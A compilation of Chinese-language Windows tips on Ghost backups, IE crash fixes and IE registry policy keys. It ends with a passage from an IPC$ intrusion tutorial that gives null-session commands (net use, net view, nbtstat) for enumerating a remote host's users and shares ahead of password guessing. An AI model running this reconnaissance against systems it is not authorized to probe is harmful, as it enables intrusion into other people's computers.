7，清理硬盘 删除 C:盘下述文件：
1> 后缀文件名为 bak、tmp、---、?LD、?yd、000、001 的全部文件；
2> Win98 系统文件夹下名为 Temp、Recent 和 Applog文件夹下的全部；
3> 清空回收站同容、清除 IE 的临时文件夹；
8，审核检查 重点检查注册表和各种配置文件的内容是否正确，硬件是否有冲突、软件是否能正常运行、需要注册的软件是否有效注册等等，确保各项性能指标正确正常，各项设置均达预定目的。
9，整理碎片 整理 C: 盘碎片。若想使备份产生的文件最小，必要时还可以将 Windows 的临时交换文件Win386.swp 设置在其它逻辑盘中；也可以退出到纯 DOS 状态，删除该文件后执行备份。
10，立即备份 特别要说明的是，上述工作一旦完成，在确信不会有错的情况下，请尽快进入下一步备份工序，这是因为 Windows 在运行时，会随时添加一些垃圾文件，会使我们“理想”的优化遭到破坏。

由于 Windows 系统优化涉及的面很深很广，且会因硬件、软件、个人喜好、工作内容的不同而不同，本文难免挂一漏万，但基本内容已不过如此，读者只要做好以上工作，我们的基本目的就已达到了。
1，分区原则 建议硬盘分成两个以上五个以下的分区，分区太少会给应用和维护带来不便；分区太多也有诸多缺点(离题太远，恕不详述)。此外，C: 盘按常规安装 Windows 系统，是备份的目标，宜分为1.5~2.0G大小，过大或过小均为不妥；最后一个分区应不小于1G，用来存放备份结果和常用小型工具软件。其它分区各随其便，不作硬性规定。

2，安装运行 有两个问题必须注意：
1>　Ghost 程序本身必须安装在非 C: 盘的其它逻辑盘，如最后一个盘中；
2>　如果你的 Ghost 是 5.1c 版本的话，应立即换用其它版本。5.1c版有一个大 Bug，即它的主程序文件无法在纯 DOS下运行。当 Windows 系统瘫痪到没法进入时，可你在 DOS 下又无法运行 Ghost 的话，你手头的版本又低于 5.1c 的话，那就遭透了：即使你的备份作的再好，此时也只有望洋兴叹了！
不瞒你说，笔者就曾遇到过这种“倒霉”事，最后耐着性子安装了 Windows 的最小系统，使 Ghost 的 5.1c 版能够运行，才得以恢复原系统。
3，创建备份 如前所述，因为我们通常都会把WINDOWS操作系统和常用软件安装在逻辑盘 C: 盘(也就是硬盘的第一分区中)，而且已经作了仔细的优化和整理，这就是下文要反复提到的目标盘。
虽然 Ghost 主程序是纯 DOS 软件，但只要不是向启动分区(即C:盘)作恢复操作，都可以直接在 Win 98 环境下运行。


ghost的使用技巧

《一键清理系统垃圾》

ghost的使用技巧

Ghost使用密技 ：电脑一方面带给用户极大的便利；另一方面，由于使用不当或不可预见的原因引起的操作系统瘫痪、数据丢失问题，也给用户带来很大的烦恼。有鉴于此，作为一名电脑用户，掌握备份与恢复的真功夫便显得尤为重要。Ghost以功能强大、使用方便著称，成为硬盘备份和恢复类软件中的翘楚。本着对正在使用Ghost的用户有所帮助、而让以前未使用过它的用户少走一些弯路的想法，本文着重谈谈该软件的一些使用技巧。

■选用哪一版本的Ghost？

    Ghost版本众多，一般而言，玩家应选用5．1c以后的版本，包括5．1c、5．1d、Ghost 2000等。由于Symantec收购了Ghost产品，故这些较新的版本均称为Symantec Ghost。以上列举的版本兼容FAT32分区方式，支持中文长文件名，能够很好地实现操作系统和数据文件的备份，亦可用于硬盘或分区的“克隆”操作，这在新装机或更换硬盘时特别有用。 　　而5．1以前的版本，则或多或少存在问题。笔者曾使用4．0版Ghost，软件已成功注册，在将分区制成Image文件时，一切正常，而当由映象文件回写分区时，操作过程显示正常，但实际上并未对目标分区进行任何改变，反复试验多次，皆未能如愿。

■为何要备份操作系统？

    为避免系统瘫痪后重装操作系统、应用软件和配置Internet相关参数的浩大工程，必须对操作系统进行备份。为此，硬盘必须进行分区，至少应分成C、D两个盘，其中C盘用来安装操作系统，D盘存放应用软件、数据文件以及Ghost备份的C盘映象文件。这样，当操作系统出现问题后，D盘并未受到任何影响，只须将D盘存放的映象文件写回C盘分区，即可将操作系统恢复原样。

■如何配置C盘？

    C盘分区大小要适当。分区太小，影响Windows运行速度；分区过大，要么造成硬盘空间浪费，要么造成备份数据量太多，既白白占用了宝贵的硬盘，又在备份和恢复过程中耗费额外的时间。 　　以使用Windows 98操作系统为例，C盘大小在600MB左右比较合适。Windows 98大约占用200MB，虚拟内存大约近百兆，再加上一些常用的工具小软件，一共占用大约400MB，还剩200MB左右自由空间，Windows 98运行起来不会捉襟见肘。对C盘分区进行备份时，映象文件即使不压缩，也就三、四百兆，可谓两全其美。

■备份前，别忘了整理C盘

（1）先整理操作系统。把与网络相关的设置配置完毕，把可能存在于Windows 98的Temp子文件夹里的临时文件都删除干净，再把My Documents（默认存放用户文档的地方）和Temporary Internet Files（浏览器暂存文件处，保留其中的文件，用户可以实现离线浏览）文件夹搬到D盘，具体搬迁办法参看相关文章。这样做的好处很明显，可以保证所有由用户产生的文件都不存放在C盘，一旦出现意外，能够毫无顾忌地重写C盘。另外，也可以删去那些用处不大的帮助文件、自述文件、屏幕保护和背景图片以及众多的音频文件等，以便使操作系统达到更好的瘦身减肥效果。
（2）在安装大型应用软件，如Office 2000、Photoshop 5．0等时，最好把它们安装到D盘，这样C盘就不至于过分膨胀，可使备份数据量大大减小。
（3）常用工具小软件，如Winzip、ACDSee、刻录小软件等，可以安装在D盘，安装在C盘也无妨，反正占不了多大空间。
最后，别忘了再进行一次彻底的磁盘碎片整理，将C盘调整到最优状态。接着，即可从DOS下运行Ghost软件，制作C盘映象文件。

■分区备份技巧

    硬盘分区备份的一般操作方法：从Ghost主选单中选择“Local→Partition→To Image”选项，打开制作分区映象文件窗口，挑选欲备份的硬盘（如果挂有一个以上硬盘）和分区，再指定映象文件名称和存放路径，确认之后，即开始生成扩展名为．gho的映象文件，耗时大约十分钟左右。
备份技巧：
（1）最好在D盘建一个Ghost文件夹，将生成的备份文件＊．gho与Ghost．exe都存放在此文件夹下。这样，日后进行恢复操作时，一启动Ghost软件，立刻就能显示出备份的映象文件，无须到处去查找。要知道，在DOS下运行Ghost软件，如果未加载鼠标驱动程序，单靠键盘找起文件来是很烦人的。
（2）将备份的映象文件设成系统、隐含、只读属性。一方面可以防止意外删除、感染病毒；另一方面可以避免在对D盘进行碎片整理时，频繁移动映象文件的位置，节约整理磁盘时间。
（3）在生成映象文件时，通常应该采用最大压缩算法，这样，生成的映象文件字节明显减少，节省硬盘空间，否则，映象文件将和C盘文件总字节数一样。采用最大压缩方式，虽然处理时间会相应延长，但分区备份和恢复操作频率很低，也许好几个月才进行一次，还是节省硬盘空间更划算。

■让备份和恢复更加保险

    由于病毒或操作失误，有可能造成映象文件丢失或文件分区表损坏。如果仅仅按照上述方法做了备份，仍然有遭到“灭顶之灾”的危险，尽管几率很小。因此有条件的话，还应该采取以下防范措施：
（1）备份文件分区表信息。采用Kill 98、KV300、Norton等软件，即可在软盘上生成文件分区表备份。如遇病毒攻击分区信息致瘫时，可轻松予以复原。 　（2）将映象文件复制到外置硬盘或刻录到光盘上，以防硬盘上的映象文件受损。
（3）将Ghost．exe文件拷贝至软盘上，必要时可以运行软盘上的文件，由光盘或外置存储设备恢复分区原貌。

■恢复备份需知

    对于采用了启动管理器分区实现双启动或多启动方式的硬盘，进行恢复分区操作（即由映象文件重写分区）时，最好先关闭启动管理器，然后进行恢复操作，待一切正常后，再将启动管理器复原。之所以这么做，是因为启动管理器所在分区必定是活动分区，如果当初制作备份的分区也是活动的，那么在执行恢复操作后，就同时出现两个活动分区，极易造成死机。 　　有时，在执行重写分区操作后，DIR列目录，发现全部是怪怪的、长长的乱码文件名，并且全部文件都位于根目录下，看不到树状子目录结构了。这时，千万不要惊慌，更不要冒失地删除文件或格式化硬盘。其实，你的硬盘根本没事儿，只需重新启动电脑，就会一切正常了。

■应用Ghost需知

（1）无论是备份还是恢复分区，都应尽量在纯DOS环境下进行，一般不要从Windows或假DOS下进行相应的操作。 　　Ghost软件包里有一个Explorer程序，在Windows环境下运行它后，可以像普通解压软件那样，随便从映象文件里释放文件或文件夹。不过，窃以为用处不大。因为Ghost的最大好处就是可以不管三七二十一，在最短的时间里可以将分区恢复原样，而无须过问到底是缺损哪个文件引起的故障。
（2）在使用Ghost进行硬盘或分区对拷时，由容量小的硬盘或分区向容量等同或大的硬盘、分区进行克隆是完全没有问题的，并且目标硬盘或分区会与源盘一样，大于源盘容量的部分，就成为自由空间。例如，源分区共600MB，采用FAT16分区方式，共有400MB数据，而目标分区共1GB，采用FAT32分区方式，则由源分区顺利克隆到目标分区后，目标分区也变成了FAT16分区方式，但容量仍为1GB，数据文件同样占据400MB空间。所以，在将电脑升级为大硬盘时，可以很容易地将原来硬盘上的内容复制过去，根本无须重装操作系统和应用软件。
（3）有些玩家的Ghost是未授权版本，需要找到扩展名为．env的文件，先行注册方能正常使用，注册以DOS下的命令行方式进行，其格式在软件包自述文件里有详细说明


IE浏览器八大经典故障写真集

《一键清理系统垃圾》

IE浏览器八大经典故障写真集

当你驾着心爱的IE在Internet上纵横驰骋时，突然桌面上弹出一个莫名其妙的警告提示框，
紧接着所有IE窗口全部关闭；或无论如何点击链接，IE始终没有反应……这些故障让人心烦意乱，
无可奈何。不过你也不用手足无措，今天我们就一起将IE常见错误揪出来，并彻底消灭！
1.发送错误报告
【故障现象】
在使用IE浏览网页的过程中，出现“Microsoft Internet Explorer遇到问题需要关闭……”
的信息提示。此时，如果单击“发送错误报告”按钮，则会创建错误报告，单击“关闭”按钮之后
会引起当前IE窗口关闭；如果单击“不发送”按钮，则会关闭所有IE窗口。
【故障点评】
这是IE为了解用户在使用中的错误而设计的一个小程序，不过我可不想当微软的“免费测试员”，
更何况每天它都会面对成千上万的报告，谁知道有没有在意我的报告问题呢？
【故障解决】
针对不同情况，可分别用以下方法关闭IE发送错误报告功能:
①对IE 5.x用户，执行“控制面板→添加或删除程序”，在列表中选择
“Internet Explorer Error Reporting”选项，然后单击“更改/删除”按钮，将其从系统中删除。
②对Windows 9x/Me/NT/2000下的IE 6.0用户，则可打开“注册表编辑器”，
找[HKEY_LOCAL_MACHINE＼Software ＼Microsoft＼Internet Explorer＼Main]，在右侧窗格
创建名为IEWatsonEnabled的DWORD双字节值，并将其赋值为0。
③对Windows XP的IE 6.0用户，执行“控制面板→系统”，切换到“高级”选项卡，单击“错误报告”
按钮，选中“禁用错误报告”选项，并选中“但在发生严重错误时通知我”，最后单击“确定”按钮。

2.IE发生内部错误，窗口被关闭
【故障现象】
在使用IE浏览一些网页时，出现错误提示对话框:“该程序执行了非法操作，即将关闭……”，
单击“确定”按钮后又弹出一个对话框，提示“发生内部错误……”。单击“确定”按钮后，
所有打开的IE窗口都被关闭。
【故障点评】
该错误产生原因多种多样，内存资源占用过多、IE安全级别设置与浏览的网站不匹配、与其他软件
发生冲突、浏览网站本身含有错误代码……这些情况都有可能，需要耐心加以解决。
【故障解决】
①关闭过多的IE窗口。如果在运行需占大量内存的程序，建议IE窗口打开数不要超过5个。
②降低IE安全级别。执行“工具→Internet选项”菜单，选择“安全”选项卡，单击“默认级别”
按钮，拖动滑块降低默认的安全级别。
③将IE升级到最新版本。IE 6.0下载地址:IE6.0 。IE 6.0 SP1下载地址: windows Update 。
可使用以IE为核心的浏览器，如MyIE2。它占用系统资源相对要少，而且当浏览器发生故障关闭时，
下次启动它，会有“是否打开上次发生错误时的页面”的提示，尽可能地帮你挽回损失.

3.出现运行错误
【故障现象】
用IE浏览网页时弹出“出现运行错误，是否纠正错误”对话框，单击“否”按钮后，
可以继续上网浏览。
【故障点评】
可能是所浏览网站本身的问题，也可能是由于IE对某些脚本不支持。
【故障解决】
①启动IE，执行“工具→Internet选项”菜单，选择“高级”选项卡，选中“禁止脚本调试”复选框，
最后单击“确定”按钮即可。
②将IE浏览器升级到最新版本。

4.IE窗口始终最小化的问题
【故障现象】
每次打开的新窗口都是最小化窗口，即便单击“最大化”按钮后，下次启动IE后新窗口仍旧是最小化的。
【故障点评】
IE具有“自动记忆功能”，它能保存上一次关闭窗口后的状态参数，IE本身没有提供相关设置选项，
不过可以借助修改注册表来实现。
【故障解决】
①打开“注册表编辑器”，
找到[HKEY_ CURRENT_USER＼Software＼Microsoft＼Internet Explorer＼Desktop＼Old WorkAreas]，
然后选中窗口右侧的“OldWorkAreaRects”，将其删除。
②同样在“注册表编辑器”
中找到[HKEY_CURRENT_USER＼Software ＼Microsoft＼Internet Explorer＼Main]，
选择窗口右侧的“Window_Placement”，将其删除。
③退出“注册表编辑器”，重启电脑，然后打开IE，将其窗口最大化，并单击“往下还原”按钮将
窗口还原，接着再次单击“最大化”按钮，最后关闭IE窗口。以后重新打开IE时，窗口就正常了！

5.IE无法打开新窗口
【故障现象】
在浏览网页过程中，单击超级链接无任何反应。
【故障点评】
多半是因为IE新建窗口模块被破坏所致。
【故障解决】
单击“开始→运行”，依次运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”
将这两个DLL文件注册，然后重启系统。如果还不行，则可以将
mshtml.dll、urlmon.dll、msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注册一下。

6.脱机却无法浏览本机上的网页
【故障现象】
通过IE的“脱机浏览”功能，我们差不多能浏览所有已经下载到本地硬盘的网页内容，这对拨号上网
的用户来说更是省钱的一大法宝。但有时，目标网页虽然在硬盘上，但是却提示“无法浏览”。
【故障点评】
这多半是由于你修改了系统时间，引起了IE历史记录的错乱。
【故障解决】
①可用直接在“临时文件夹”中搜索的方法来激活它。按下Win+F，在“包含文字”处输入部分记忆中
的关键字，在“搜索”处按“浏览”按钮选择IE临时文件夹的地址，
如“C:＼WINDOWS＼Temporary Internet Files”，单击“开始查找”，在结果列表里双击目标页打开。
②可以尝试用腾讯的TE等浏览器来脱机浏览。

7.联网状态下，浏览器无法打开某些站点
【故障现象】
上网后，在浏览某些站点时遇到各种不同的连接错误。
【故障点评】
这种错误一般是由于网站发生故障或者你没有浏览权限所引起。
【故障解决】
针对不同的连接错误，IE会给出不同的错误信息提示，比较常见的有以下几个:
①提示信息:404 NOT FOUND这是最为常见的IE错误信息。主要是因为IE不能找到你所要求的网页文件，
该文件可能根本不存在或者已经被转移到了其他地方。
②提示信息:403 FORBIDDEN常见于需要注册的网站。一般情况下，可以通过在网上即时注册来解决该
问题，但有一些完全“封闭”的网站还是不能访问的。
③提示信息:500 SERVER ERROR通常由于所访问的网页程序设计错误或者数据库错误而引起，你只有
等待对方网页纠正错误后再浏览了。

8.IE无法重新安装
【故障现象】
IE不能正常使用，在重装时却提示“发现系统中有该版本的IE”而拒绝安装；“添加或删除程序”
中又没有卸载选项。
【故障点评】
“重装”是解决IE故障的“终极大法”，也是初级用户的法宝。
【故障解决】
①对IE 5.0的重装可按以下步骤进行:
第一步:打开“注册表编辑器”，
找到[HKEY_LOCAL_ MACHINE＼Software＼Microsoft＼Internet Explorer]，
单击其下的Version Vector键。
第二步:在右侧窗格中双击IE子键，将原来的“5.0002”改为“4.0”，单击“确定”后退出
“注册表编辑器”。
第三步:重启后，就可以重装IE 5.0了。
②IE 6.0的重装有两种方法:
方法1:打开“注册表编辑器”，找到
[HKEY_LOCAL_ MACHINE＼SOFTWARE＼Microsoft＼Active Setup
＼Installed Components＼{89820200-ECBD-11cf-8B85-00AA005B4383}]，
将IsInstalled的DWORD值改为0就可以了。
方法2:放入Windows XP安装盘，在“开始→运行”
窗口键入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%＼Inf＼ie.inf”。


IE四个经典故障及其解决方案

《一键清理系统垃圾》

IE四个经典故障及其解决方案

    IE作为Windows系统中一个重要部分，是我们使用最多同时也是麻烦最多的部分，下面是笔者在使用过程中发现并解决了的四个比较典型的故障。

    故障一：无法改变IE的安全等级

    现象：打开桌面上IE的鼠标右键菜单并选择“属性”，切换至“安全”标签，发现“自定义级别”和“默认级别”按钮变成灰色不可选状态，使得我们不能改变IE的安全等级属性。

    解决：这是由于在注册表中添加了一个“SecChangeSettings”键所限制的。打开“开始→运行”，输入 regedit 打开注册表编辑器，依次展开[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]分支，将右侧窗口中的“SecChangeSettings”键删除后，重启IE即可解决此故障。

    故障二：“Internet选项”中的“高级”选项丢失

    现象：打开IE的属性设置中心并切换至“高级”标签，一般而言，这里有许多高级的选项设置，不过笔者却发现自己的“高级”标签没有任何的选项设置，而是白茫茫的一片。

    解决：在微软的官方网站上找到了此故障的解决办法（http://support.microsoft.com/?kbid=273492），故障原因是“This issue can occur if the following registry key is missing or damaged: HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions.”，也就是注册表中的“AdvancedOptions”丢失或损坏。在这里，微软给的“官方答案”是重装IE，其实我们可以用更加简单的方法来解决。

    方法一：从另一台相同系统的注册表中将“AdvancedOptions”册键导出，然后合并到自己的注册表，重启系统问题即可解决。

    方法二：打开“开始→运行”，然后输入“REGSVR32 /n /i INETCPL.CPL”（不包括引号），确认所弹出的窗口，重新启动IE即可恢复原样。

    故障三：“弹出窗口阻止程序”被禁止

    现象：Windows SP1系统打上SP2补丁后，使用IE的过程中发觉IE没有所谓的弹出窗口阻止的功能，而打开IE的“工具”菜单中并没有发现有“弹出窗口阻止程序”这一选项，同时打开“Internet 选项”并切换至“隐私”标签，其中“组织弹出窗口”和“设置”变为灰色不可选（如图1）。

图1

    解决：打开注册表编辑器，然后依次展开[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]分支，然后将右侧窗口中“NoPopupManagement”键的值改为1，或者此删除。关闭注册表，重启IE故障即可解决。

    故障四：IE插件管理功能被管理员禁止

    现象：同样是从Windows XP SP1升级到SP2后，在IE的“工具”中会添加一个“管理加载项”，但是打开这个“管理加载项”窗口，选择一个加载到IE上的插件，发现“设置”中提示“此加载项由您的管理员管理”，无法使用旁边的“启用”或“禁止”来管理IE插件，同时亦无法“更新ActiveX”（如图2）。

图2

    解决：第一步：在记事本中输入以下的内容，然后另存为A.reg。

    Windows Registry Editor Version 5.00

    （空一行）

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ext]

    "RestrictToList"=dword:00000000

    第二步：双击运行A.reg，将此文件合并到注册表中。关闭然后重启一次IE窗口即可。

作者：未雨绸缪


IE选项注册表控制大全

《一键清理系统垃圾》

IE选项注册表控制大全

近来，很多网友在各大BBS提出一个相同的问题----IE选项全部或其中某几个不能使用，怎么办？本来有关IE的选项的问题Solon已经发表过相关的文章，但是还是有很多不是很了解注册表的朋友看不懂，在这种情况下，我只好重新解释一下相关的Dword值的用途，希望大家能够理解。如果还是不能够理解的话，就到这里下载一个还原文件吧。
特别注意：有些系统没有以下的键值，需要手工添加：
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\GeneralTab Internet Explorer选项中的常规
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab Internet Explorer选项中的安全
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\ContentTab Internet Explorer选项中的内容
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\ConnectionsTab Internet Explorer选项中的连接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\ProgramsTab Internet Explorer选项中的程序
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\AdvancedTab Internet Explorer选项中的高级
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\PrivacyTab Internet Explorer选项中的隐私 ◆IE6中才有◆

以上是几个大项，小项的解释在下面：
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Colors 颜色
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Links 链接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Fonts 字体
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Languages 语言
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Connection Settings 连接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Proxy 代理
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: HomePage 主页
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: History 历史
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Messaging 程序--电子邮件、新闻组、Internet呼叫
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Ratings 分级审查
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Certificates 证书+发行商
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CertifPers 证书
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CertifSite 证书
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CertifPub 发行商
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Cache IE临时文件大小设置控制
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: AutoConfig 局域网自动配置
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Accessibility 辅助功能
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: SecChangeSettings 安全自定义
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: SecAddSites IE中安全--站点增加控制
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Profiles 内容--个人信息--配置文件
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: FormSuggest 内容--个人信息--自动完成--表单
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: FormSuggest Passwords 内容--个人信息--自动完成--表单上的用户名和密码
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Connwiz Admin Lock 连接--建立连接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CalendarContact 程序--日历、联系人列表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Advanced 高级
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Settings Internet临时文件
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: ResetWebSettings 程序--重置WEB设置
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Check_If_Default 检查IE是不是默认浏览器

以上就是注册表中IE选项控制键值。
使用方法：假设要屏蔽主页选项，就可以在HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\下建立一个Dwoed值，并修改为1，这样就可以直接取消IE中有关主页的选项。还原方法：将Dword=1修改为Dword=0即可。经过测试，这种方法在98/2000/XP下均有效。


让IE以最大化显示

《一键清理系统垃圾》

让IE以最大化显示

    问：我使用的操作系统是Windows 2000，上网一段时间后，突然发觉IE无法以最大化显示，把IE重装一遍后，也无法解决这个问题，请问我该怎么办？

    答：在“运行”中输入regedit打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\”，在右边的窗口中删除“Window_Placement”键，在 “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old Work-Areas”右边窗口中删除“OldWorkAreaRects”键。关闭注册表编辑器，重新启动计算机，连续两次最大化IE窗口(即“最大化→还原→最大化”)，再次重新启动IE就可以了。


IPC$命令详解

《一键清理系统垃圾》

IPC$命令详解

一 摘要
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$所使用的端口
六 ipc管道在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 关于at命令和xp对ipc$的限制
十 如何打开目标的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令
十二 入侵中可能会用到的命令
十三 对比过去和现今的ipc$入侵
十四 如何防范ipc$入侵
十五 ipc$入侵问答精选

一 摘要
注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列。

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系 统安全性的降低。
平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？

三 什么是空会话
在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建
立；
2）服务器产生一个随机的64位数（实现挑战）传送回客户；
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结
果返回到服务器（实现响应）；
4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确 后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程，那么空会话又如何呢？

空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系 统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：
Everyone
Network
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？

四 空会话可以做什么
对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份#作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。
从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成 功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令：

1 首先，我们先建立一个空连接（当然，这需要目标开放ipc$）
命令：net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。

2 查看远程主机的共享资源
命令：net view \\ip
解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。

在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看远程主机的当前时间
命令： net time \\ip
解释：用此命令可以得到一个远程主机的当前时间。

4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）
命令：nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表，返回如下结果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER UNIQUE Registered
OYAMANISHI-H GROUP Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
..__M##ROWSE__. GROUP Registered
INet~Services GROUP Registered
IS~SERVER...... UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的#作会在Event Log中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？

五 ipc$所使用的端口
首先我们来了解一些基础知识：
1 SMB: (Server Message Block) Windows协议族，用于文件打印共享的服务；
2 NBT: (NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：

对于win2000客户端（发起端）来说：
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。

对于win2000服务器端来说：
